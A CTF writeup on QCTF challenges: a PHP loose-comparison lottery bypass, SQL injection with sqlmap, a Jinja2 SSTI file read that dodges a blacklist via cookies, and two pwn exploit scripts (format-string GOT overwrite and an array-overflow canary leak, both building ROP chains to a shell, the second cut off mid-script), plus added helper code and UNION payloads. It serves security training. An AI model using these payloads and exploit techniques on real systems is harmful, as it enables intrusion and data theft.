I. A few words of preamble
I didn't take part in XMAN, but I did dabble in QCTF. The challenges were decent, though I wonder whether they are a bit unfriendly to newcomers like us; still, I got quite a lot out of it. Here is my record of the CTF writeup. I'm a newbie and don't really know how to write a wp, so veterans please skip ahead.
—— Hawking, A Brief History of Time
II. Misc
####X-man-A face
- Challenge description: a face of utter confusion
- Solution: the challenge is an image. Open it in a paint program and repair it: copy the intact top-right corner (finder pattern) onto the two missing left-hand corners, after which the QR code scans with a phone.
III. Web
####Lottery
- Challenge description: http://47.96.118.255:8888
- Solution:
You can register after opening the challenge, but once you log out you cannot log in again.
The functionality: pick 7 numbers; the server counts how many positions match the winning numbers and pays out coins accordingly, and enough coins buy the flag.
A scan first turns up a `.git` leak.
After pulling the repository down with a tool and auditing the source, the vulnerable code in the api is:
```
if($numbers[$i] == $win_numbers[$i]){
    $same_count++;
}
```
`$win_numbers[$i]` is unpredictable.
`$numbers[$i]` comes straight from the user's JSON body with no validation, so the attacker controls not only the value but its type. `==` is PHP's loose comparison: when one operand is a bool, the other side is converted to bool as well, and every non-zero number converts to `true`. Sending `true` in every position therefore matches every non-zero winning digit:
payload: {"1":true,"2":true,"3":true,"4":true,"5":true,"6":true,"0":true}
Submit twice, the balance grows, buy the flag.
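Added example (Python, not the challenge's PHP): a model of the PHP 5/7 loose-comparison rules for the types an attacker can inject through `json_decode` (bool, int, numeric string), applied to the audited loop, next to a hardened count that validates the type before comparing. The draws are constructed; only the comparison semantics are PHP's.

```python
# Added example: a Python model of how PHP's loose comparison (==) treats the
# attacker-chosen JSON types in the Lottery check.  Not the challenge's code; only
# the type pairs that matter here (bool, int, numeric string) are modelled.

def php_truthy(v):
    """PHP's conversion to bool for the scalar types in play."""
    if isinstance(v, bool):
        return v
    if isinstance(v, int):
        return v != 0
    if isinstance(v, str):
        return v not in ("", "0")          # "" and "0" are the only falsy strings
    return v is not None

def php_loose_eq(a, b):
    """PHP `$a == $b` for bool / int / numeric-string operands (PHP 5/7 rules)."""
    if isinstance(a, bool) or isinstance(b, bool):
        return php_truthy(a) == php_truthy(b)   # bool vs anything: both sides become bool
    if isinstance(a, str) and isinstance(b, str):
        if a.lstrip("-").isdigit() and b.lstrip("-").isdigit():
            return int(a) == int(b)            # two numeric strings compare numerically
        return a == b
    if isinstance(a, str):
        return a.lstrip("-").isdigit() and int(a) == b
    if isinstance(b, str):
        return b.lstrip("-").isdigit() and a == int(b)
    return a == b

def ticket_from_json(obj, n=7):
    """JSON object with keys "0".."6" -> ordered list, as PHP's json_decode array."""
    return [obj[str(i)] for i in range(n)]

def same_count_vulnerable(numbers, win_numbers):
    """Mirrors the audited loop: count positions where numbers[i] == win_numbers[i]."""
    return sum(1 for i in range(len(win_numbers))
               if php_loose_eq(numbers[i], win_numbers[i]))

def same_count_fixed(numbers, win_numbers):
    """Hardened version: accept only integers 0-9 and compare strictly
    (in PHP: is_int() plus === , or a digit whitelist on the raw input)."""
    count = 0
    for i in range(len(win_numbers)):
        n = numbers[i]
        if isinstance(n, bool) or not isinstance(n, int) or not 0 <= n <= 9:
            raise ValueError("ticket must contain digits 0-9 only")
        if n == win_numbers[i]:
            count += 1
    return count

# the payload from the writeup: seven JSON `true` values under keys "0".."6"
PAYLOAD = {"1": True, "2": True, "3": True, "4": True, "5": True, "6": True, "0": True}

if __name__ == "__main__":
    draw = [3, 1, 4, 1, 5, 9, 2]                 # constructed winning numbers
    print(same_count_vulnerable(ticket_from_json(PAYLOAD), draw))
```

`true == 0` and `true == "0"` are false in PHP, so a draw containing a 0 scores 6 of 7 with this payload instead of 7; the hardened version rejects the ticket outright.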
####NewsCenter
- Challenge description: This is to0 s1mple
http://47.96.118.255:33066
- Solution:
The search parameter is directly injectable; nothing is filtered.
Capture the request and save it as 1.txt:
```
POST / HTTP/1.1
Host: 47.96.118.255:33066
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Referer: http://47.96.118.255:33066/
Cookie: PHPSESSID=5a3c9494e02ed3c9d0b9008622609f94
Connection: keep-alive
Upgrade-Insecure-Requests: 1

search=asasas
```
Then run `sqlmap -r 1.txt -D news -T secret_table --dump` (the database and table names come from an earlier enumeration pass with `--dbs` and `--tables`).
Result:
```
+----+-----------------------------+
| id | fl4g                        |
+----+-----------------------------+
| 1  | QCTF{sq1_inJec7ion_ezzzzzz} |
+----+-----------------------------+
```
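Added example (not the challenge's code): a constructed SQLite stand-in for the NewsCenter search, showing why the `search` parameter was injectable, what sqlmap's UNION technique does by hand, and what the fix looks like. The table and column names (`news`, `secret_table`, `fl4g`) are the ones sqlmap dumped; the news rows are made up. If the real backend is MySQL, schema enumeration goes through `information_schema` instead of `sqlite_master`.

```python
# Added example: in-memory SQLite model of the vulnerable search and its fix.
import sqlite3

def build_db():
    """Constructed schema mirroring what sqlmap found (rows are invented)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, content TEXT);
        CREATE TABLE secret_table (id INTEGER PRIMARY KEY, fl4g TEXT);
        INSERT INTO news (title, content) VALUES ('Hello world', 'first post');
        INSERT INTO news (title, content) VALUES ('Second story', 'more text');
        INSERT INTO secret_table (fl4g) VALUES ('QCTF{sq1_inJec7ion_ezzzzzz}');
    """)
    return conn

def search_vulnerable(conn, search):
    """String concatenation: the user's text becomes part of the SQL grammar."""
    sql = "SELECT id, title FROM news WHERE title LIKE '%" + search + "%'"
    return conn.execute(sql).fetchall()

def search_fixed(conn, search):
    """Bound parameter: the text can only ever be a LIKE pattern, never SQL."""
    sql = "SELECT id, title FROM news WHERE title LIKE '%' || ? || '%'"
    return conn.execute(sql, (search,)).fetchall()

# What sqlmap automates: close the quote, UNION in a query of the same column
# count, and comment out the trailing `%'` that the application appends.
LIST_TABLES = "zzz%' UNION SELECT 1, name FROM sqlite_master WHERE type='table' -- "
DUMP_FLAG = "zzz%' UNION SELECT id, fl4g FROM secret_table -- "

def enumerate_tables(conn):
    """Schema discovery through the injection (sorted: UNION order is unspecified)."""
    return sorted(row[1] for row in search_vulnerable(conn, LIST_TABLES))

def dump_flag(conn):
    """Data extraction through the injection: the row sqlmap printed above."""
    return search_vulnerable(conn, DUMP_FLAG)

if __name__ == "__main__":
    db = build_db()
    print(enumerate_tables(db))
    print(dump_flag(db))
    print(search_fixed(db, DUMP_FLAG))   # the same payload, harmless once bound
```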
####Confusion1
- Challenge description: One day, Bob said "PHP is the best language!", but Alice didn't agree, so Alice wrote a website to prove it. She published it before finishing it, but I found something WRONG on some page. (Please DO NOT use a scanner!)
http://47.96.118.255:2333/
- Solution:
index.php opens, but the login and registration pages do not:
```
404 Not Found
Not Found
The requested URL /login.php was not found on this server.
Apache/2.4.10 (Debian) Server at 47.96.118.255 Port 2333
```
The 404 page hints at where the flag lives, so this challenge is about reading a file.
Scanning is out: it gets you banned.
This recalled a similar ASIS challenge, so the guess was SSTI (server-side template injection), since the requested path is reflected into the 404 page.
Requesting `http://47.96.118.255:2333/{{ 7*7 }}`
returns
```
The requested URL /49 was not found on this server.
```
Requesting `http://47.96.118.255:2333/{{ 7*'7' }}`
returns
```
The requested URL /7777777 was not found on this server.
```
which confirms the engine is Jinja2 (string repetition; Twig would have coerced the string and returned 49).
PortSwigger's post on server-side template injection covers this well: https://portswigger.net/blog/server-side-template-injection
However, `class` and `read` are filtered, so the usual walk from a string literal down to the `file` class cannot be written out directly and needs a bypass.
`request` is not filtered,
so the forbidden names can be fetched from somewhere else: send them as cookies and look them up through `request.cookies` with subscript syntax, which Jinja2 resolves like attribute access when the item lookup fails.
Script:
```
import requests

# the blacklist only inspects the URL, so the forbidden attribute names travel in
# cookies and are looked up through `request.cookies` inside the template
url = ('http://47.96.118.255:2333/'
       "{{''[request.cookies.p1][request.cookies.p2][2][request.cookies.p3]()[40]"
       "('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.cookies.p4]()}}")
cookies = {
    'p1': '__class__',
    'p2': '__mro__',          # [2] is `object` on the server's Python 2 (str, basestring, object)
    'p3': '__subclasses__',   # [40] is where `file` sits in that list; environment-specific
    'p4': 'read',
}
print(requests.get(url, cookies=cookies).text)
```
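Added example (Python, not the writeup's code, and it needs no Jinja2): the payload hard-codes `__mro__[2]` and `__subclasses__()[40]`, which are the positions of `object` and `file` on that server's Python 2. Both offsets change with interpreter version and loaded modules (on Python 3 the file class is `_io.FileIO`, two levels below `object`, and `__mro__` of `str` has only two entries). This locates the gadget by name instead, starting from the same `''.__class__.__mro__` chain the template uses, and reads a constructed temporary file through it.

```python
# Added example: find the SSTI file-reading gadget by name rather than by index.
import os
import tempfile

def object_subclasses():
    # Same starting point as the template payload: walk the str type's MRO to
    # `object` (its last entry on both Python 2 and 3) and list its loaded subclasses.
    return ''.__class__.__mro__[-1].__subclasses__()

def find_gadget_index(name):
    """Index into object.__subclasses__() of the first class called `name`, or None.
    This is the number that stands at `[40]` in the payload."""
    for idx, cls in enumerate(object_subclasses()):
        if cls.__name__ == name:
            return idx
    return None

def find_class_by_name(name, root=object, seen=None):
    """Depth-first search of the whole class tree below `root`; a flat scan of
    object.__subclasses__() misses classes that are not direct subclasses."""
    seen = set() if seen is None else seen
    # type.__subclasses__(cls) works for every class, including metaclasses such
    # as `type` itself, where cls.__subclasses__() would need an explicit argument
    for cls in type.__subclasses__(root):
        if cls in seen:
            continue
        seen.add(cls)
        if cls.__name__ == name:
            return cls
        found = find_class_by_name(name, cls, seen)
        if found is not None:
            return found
    return None

def read_file_via_gadget(path):
    """Read `path` through a file class reached from `object`, as the payload does."""
    file_cls = find_class_by_name('file') or find_class_by_name('FileIO')  # Python 2 / 3
    if file_cls is None:
        raise RuntimeError("no file-like gadget is loaded")
    handle = file_cls(path)
    try:
        data = handle.read()
    finally:
        handle.close()
    return data.decode() if isinstance(data, bytes) else data

def demo_roundtrip(content="QCTF{constructed_example_flag}\n"):
    """Write a constructed flag file, read it back through the gadget, clean up."""
    with tempfile.NamedTemporaryFile("w", delete=False) as f:
        f.write(content)
        path = f.name
    try:
        return read_file_via_gadget(path)
    finally:
        os.remove(path)

if __name__ == "__main__":
    print(find_gadget_index('type'), find_class_by_name('FileIO'))
    print(demo_roundtrip(), end="")
```

The same search, run inside the template against the target, is how you would recover the `[40]` offset for a server whose interpreter differs from the one the payload was written for.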
IV. PWN
####notebook
- Challenge description: nc 118.31.49.175 9999
- Solution: A stack overflow, plus a format-string bug in check2. The format string is used to overwrite the GOT entry of `stack_chk_fail` with the address of a pop gadget, so that when the overflow trips the canary check the call into `__stack_chk_fail` lands on the gadget and returns into a ROP chain placed on the stack. Exploit (Python 2, zio):
```python
from zio import *
import struct

#target=('127.0.0.1', 10000)
target=('118.31.49.175' ,9999)
io = zio(target, timeout=10000,
         print_read=COLORED(RAW, 'red'),
         print_write=COLORED(RAW, 'green'))
c2=raw_input('go?')
io.read_until('May I have your name?')
# format string: print 0x880B bytes, then %25$hn stores the count's low 16 bits
# through the pointer found in argument 25, i.e. the GOT slot of __stack_chk_fail
# appended right after the 16-byte format text (3 NUL bytes pad it to a dword boundary)
payload='%'+str(0x880B)+'d'+'%25$hn'+'\x00'*3+l32(0x0804A028)
payload+='1'*0x70                 # filler through the canary: smashing it triggers __stack_chk_fail,
                                  # whose GOT entry now points at the pop gadget that returns into the chain
payload+=l32(0x08048791) #get input
payload+=l32(0x08048CAA) #pop 2
payload+=l32(0x0804A100)
payload+=l32(0x8)
payload+=l32(0x080485C0) #system
payload+=l32(0x0)
payload+=l32(0x0804a100)
io.writeline(payload)
raw_input('go?')
io.write('/bin/sh\x00')           # consumed by the "get input" call, then handed to system
io.interact()
#QCTF{f0rmat_s7r1ng_is_happy_}
```
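Added example (not the writeup's code): build the `%hn` write the notebook exploit uses and check it against a tiny printf model before firing it at a remote. Addresses and values are the ones in the script above; the assumption that the buffer starts at printf argument 21 is inferred from the payload layout (16 bytes of format text, pointer at argument 25). Only the low halfword of the GOT entry is written, which works because that entry still holds its unresolved `0x0804xxxx` PLT value (`__stack_chk_fail` has never been called).

```python
# Added example: one-shot %hn GOT write, constructed and checked offline.
import re
import struct

GOT_STACK_CHK_FAIL = 0x0804A028   # GOT slot overwritten (value from the script)
TARGET_LOW16 = 0x880B             # new low halfword -> 0x0804880B, the pop gadget
BUFFER_ARG = 21                   # printf argument holding our buffer's first dword (inferred)

def build_hn_write(ptr, value16, buffer_arg=BUFFER_ARG, prefix_len=0):
    """Return (payload, arg_index) for one 2-byte write.

    `%<pad>d` prints `pad` bytes so the running count equals `value16` mod 0x10000,
    then `%<k>$hn` stores the count's low 16 bits through the pointer in argument k.
    The pointer is appended to the payload 4-byte aligned, so k depends on the length
    of the format text, which in turn contains k: solve it with a short fixed-point loop."""
    pad = (value16 - prefix_len) % 0x10000
    if pad < 10:                  # %d may print up to 10 digits; keep the width authoritative
        pad += 0x10000
    arg_index = buffer_arg + 4
    for _ in range(4):
        fmt = "%%%dd%%%d$hn" % (pad, arg_index)
        padded_len = (len(fmt) + 3) & ~3
        new_index = buffer_arg + padded_len // 4
        if new_index == arg_index:
            break
        arg_index = new_index
    else:
        raise ValueError("argument index did not converge")
    payload = fmt.encode() + b"\x00" * (padded_len - len(fmt)) + struct.pack("<I", ptr)
    return payload, arg_index

_DIRECTIVE = re.compile(r"%(?:(\d+)\$)?(\d*)(hhn|hn|n|d|c)")

def simulate_printf(fmt, args):
    """Minimal printf model for %d, %c and the %n family on a 32-bit target.
    `args[0]` is printf's first variadic argument; returns (bytes_written, writes)
    where writes maps pointer -> (value stored, size in bytes)."""
    written, writes, pos, next_arg = 0, {}, 0, 0
    for m in _DIRECTIVE.finditer(fmt):
        written += m.start() - pos                 # literal text before this directive
        pos = m.end()
        if m.group(1):
            idx = int(m.group(1)) - 1              # positional: %25$ -> args[24]
        else:
            idx, next_arg = next_arg, next_arg + 1
        width = int(m.group(2) or 0)
        arg, conv = args[idx], m.group(3)
        if conv == "d":
            written += max(width, len(str(arg)))
        elif conv == "c":
            written += max(width, 1)
        elif conv == "n":
            writes[arg] = (written & 0xFFFFFFFF, 4)
        elif conv == "hn":
            writes[arg] = (written & 0xFFFF, 2)
        else:                                      # hhn
            writes[arg] = (written & 0xFF, 1)
    written += len(fmt) - pos
    return written, writes

def check_payload():
    """Place the payload in a constructed 32-bit argument list and confirm the write."""
    payload, arg_index = build_hn_write(GOT_STACK_CHK_FAIL, TARGET_LOW16)
    fmt = payload.split(b"\x00", 1)[0].decode()
    stack = [0] * (BUFFER_ARG - 1)                 # arguments 1..20: junk (constructed)
    stack += [struct.unpack("<I", payload[i:i + 4])[0] for i in range(0, len(payload), 4)]
    _, writes = simulate_printf(fmt, stack)
    return payload, arg_index, writes

if __name__ == "__main__":
    payload, k, writes = check_payload()
    print(payload, k, {hex(a): (hex(v), n) for a, (v, n) in writes.items()})
```

The builder reproduces the script's `%34827d%25$hn` + 3 NUL bytes + GOT address exactly; the `prefix_len` parameter is for chaining several writes in one format string, where later pads must account for bytes already printed.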
####babycpp
- Challenge description: nc 118.31.49.175 2333
- Solution: babycpp has an array out-of-bounds bug. The hard part is leaking the canary: the unquire function is used to copy the canary value into a stack slot further toward the front of the array, where it becomes readable, after which a ROP chain gets a shell. Exploit (Python 2, zio):
```python
from zio import *
import struct

#target=('127.0.0.1', 10000)
target=('118.31.49.175', 2333)
io = zio(target, timeout=10000,
         print_read=COLORED(RAW, 'red'),
         print_write=COLORED(RAW, 'green'))
c2=raw_input('go?')

# menu (from the prompts): 1 = set the array size n, 2 = input n numbers, 3 = print, 4 = exit
io.read_until('input n:')
io.writeline('20')
io.read_until('4.exit.')
io.writeline('2')
payload = '1\n' + ''.join(str(i) + '\n' for i in range(1, 20))   # 20 values: 1, 1, 2, ..., 19
io.read_until('input 20 num:')
io.writeline(payload)

# shrink to 2 elements, refill, then grow to 24, 23, 22, 21 and print: each round
# (through the unquire function) moves the canary one slot closer to the readable range
for n in ('24', '23', '22', '21'):
    io.read_until('4.exit.')
    io.writeline('1')
    io.writeline('2')
    io.read_until('4.exit.')
    io.writeline('2')
    io.read_until('input 2 num:')
    io.writeline('1\n1')
    io.read_until('4.exit.')
    io.writeline('1')
    io.writeline(n)
    io.read_until('4.exit.')
    if n != '21':
        io.writeline('3')

raw_input('go?')
io.writeline('3')
# after the '19 ' marker skip two tokens, then the canary's low and high dwords follow
io.read_until('19 ')
io.read_until(' ')
io.read_until(' ')
test=io.read_until(' ')
low=int(test[0:-1],10)
test=io.read_until(' ')
high=int(test[0:-1],10)
gs=high*0x100000000+low
print hex(gs)

# second stage: 56 numbers = 28 qwords, each sent as a (low, high) dword pair
io.read_until('4.exit.')
io.writeline('1')
io.writeline('56')
io.read_until('4.exit.')
raw_input('go?')
io.writeline('2')
payload='1\n1\n'*11                               # filler up to the canary slot
payload+=str(low)+'\n'+str(high)+'\n'             # put the leaked canary back in place
payload+='1\n'+'1\n'
payload+=str(0x00401251)+'\n'+str(0x0)+'\n'
payload+=str(0x00602090)+'\n'+str(0x0)+'\n'
payload+='1\n'+'1\n'
payload+=str(0x00401253)+'\n'+str(0x0)+'\n'
payload+=str(0x00602200)+'\n'+str(0x0)+'\n'
payload+=str(0x00400Ab0)+'\n'+str(0x0)+'\n'
payload+=str(0x00401251)+'\n'+str(0x0)+'\n'
payload+=str(0x00602050)+'\n'+str(0x0)+'\n'
payload+='1\n'+'1\n'
payload+=str(0x00401253)+'\n'+str(0x0)+'\n'
payload+=str(0x006020c0)+'\n'+str(0x0)+'\n'
payload+=str(0x00400af0)+'\n'+str(0x0)+'\n'
payload+=str(0x00401253)+'\n'+str(0x0)+'\n'
payload+=str(0x00602050)+'\n'+str(0x0)+'\n'
payload+=str(0x00400Ad0)+'\n'+str(0x0)+'\n'
io.read_until('input 56 num:')
io.writeline(payload)
io.read_until('4.exit.')
io.writeline('4')
io.read_until('\n')
io.read(2)
test=io.read(6)+'\x00'*2                          # 6 leaked bytes of a 64-bit address
system=struct.unpack("<Q", test)[0]               # the writeup ends mid-line here; what follows was not on the page
```
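Added example (not the writeup's code): helpers for the transport the babycpp exploit relies on. The program stores 32-bit integers, so every 64-bit ROP element goes in as two decimal dwords (low first) and the leaked canary comes back as two printed dwords, which the script recombines with `high*0x100000000+low`. Whether the binary prints and parses those values as signed `int` is not stated on the page; the `signed` path is an assumption for that case, where a dword with the top bit set prints negative and must be sent back negative.

```python
# Added example: 64-bit <-> dword-pair encoding for an int-array input channel.
MASK32 = 0xFFFFFFFF

def to_signed32(v):
    """Reinterpret a dword as a signed 32-bit int (what `cout << int` would print)."""
    v &= MASK32
    return v - 0x100000000 if v & 0x80000000 else v

def split_qword(value, signed=False):
    """64-bit value -> (low, high) decimal strings, in the order the exploit sends them."""
    value &= 0xFFFFFFFFFFFFFFFF
    low, high = value & MASK32, value >> 32
    if signed:                      # assumption: the program parses with a signed int
        low, high = to_signed32(low), to_signed32(high)
    return str(low), str(high)

def join_dwords(low, high):
    """Two printed dwords -> 64-bit value.  Generalises the script's
    `gs = high*0x100000000 + low`, which is only right when neither dword printed negative."""
    return ((int(high) & MASK32) << 32) | (int(low) & MASK32)

def encode_chain(qwords, signed=False):
    """Flatten 64-bit values into the newline-separated input the program reads:
    2 * len(qwords) numbers, low dword before high dword."""
    parts = []
    for q in qwords:
        parts.extend(split_qword(q, signed))
    return "\n".join(parts) + "\n"

if __name__ == "__main__":
    print(encode_chain([0x00401251, 0x00602090]), end="")        # two addresses from the script
    print(hex(join_dwords("-559038737", "4198993")))              # a negative low dword, constructed
```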